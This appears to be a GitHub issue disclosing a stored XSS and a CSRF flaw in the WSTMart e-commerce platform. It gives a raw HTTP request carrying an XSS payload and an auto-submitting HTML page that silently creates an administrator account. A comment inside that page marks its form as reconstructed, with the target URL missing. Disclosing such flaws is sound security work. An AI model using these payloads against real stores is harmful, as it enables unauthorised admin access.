
There are XSS vulnerabilities and CSRF vulnerabilities that can work together to add administrator users #1

Open
denyorallow opened this issue Dec 22, 2018 · 0 comments

@denyorallow

Shangtao Software's WSTMart e-commerce system is a B2B2C e-commerce platform built on the ThinkPHP 5.1 framework. It is currently the most complete open-source shopping system based on ThinkPHP 5, with six channels in one (PC, mobile WAP, micro-mall, Android app, iOS app and WeChat mini-program) that interoperate with each other, and it offers today's most popular three-level distribution and micro-bargaining features, making it well suited to enterprises and individuals who want to launch an online business platform quickly.

The system's code is clear and easy to understand; a large number of visual reports make it convenient for operators to make decisions; rich marketing functions give the system broad application scenarios; and a good plug-in mechanism makes it easy to extend. The system is simple to operate, safe and stable, and iterates quickly, making it the best choice for most users, both for direct use and for secondary development.

Official address: http://www.wstmart.net

0x01 Stored XSS
Function point: storefront - product detail page - product consultation
PoC:
POST /st/wstmart_v2.0.8_181212/index.php/home/goodsconsult/add.html HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://xx.xx.xx.xx/st/wstmart_v2.0.8_181212/goods-2.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 83
Connection: close
Cookie: PHPSESSID=d1jf7a74dk57sk5jebtg2nckeu; WSTMART_history_goods=think%3A%5B%222%22%2C%2265%22%5D; UM_distinctid=167d5b268981b9-03d665d7d22d54-4c312e7e-100200-167d5b2689945e; CNZZDATA1263804910=767510099-1545475868-%7C1545481454

goodsId=2&consultType=1&consultContent=%3Cimg+src%3Dx+onerror%3Dalert(%2Fxss%2F)%3E

0x02 CSRF

Function point: admin backend - staff management - login account
PoC:
1234.html

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Document</title>
</head>
<body>
<!-- The <form> and <input> elements were lost when the report was posted; they are
     reconstructed here from the fields the script below sets. The action must point at
     the staff-save endpoint of the admin backend, which the report does not give. -->
<form name="test" method="post" action="STAFF_SAVE_URL_NOT_GIVEN_IN_REPORT">
<input type="hidden" name="staffId">
<input type="hidden" name="loginName">
<input type="hidden" name="staffPhoto">
<input type="hidden" name="loginPwd">
<input type="hidden" name="staffName">
<input type="hidden" name="staffNo">
<input type="hidden" name="RoleId">
<input type="hidden" name="staffPhone">
<input type="hidden" name="wxOpenId">
<input type="hidden" name="workStatus">
<input type="hidden" name="staffStatus">
</form>
<script type="text/javascript">
test.staffId.value = "0";
test.loginName.value = "admin3";
test.staffPhoto.value = "";
test.loginPwd.value = "admin3";
test.staffName.value = "admin3";
test.staffNo.value = "";
test.RoleId.value = "0";
test.staffPhone.value = "";
test.wxOpenId.value = "";
test.workStatus.value = "1";
test.staffStatus.value = "1";
test.submit();
</script>
</body>
</html>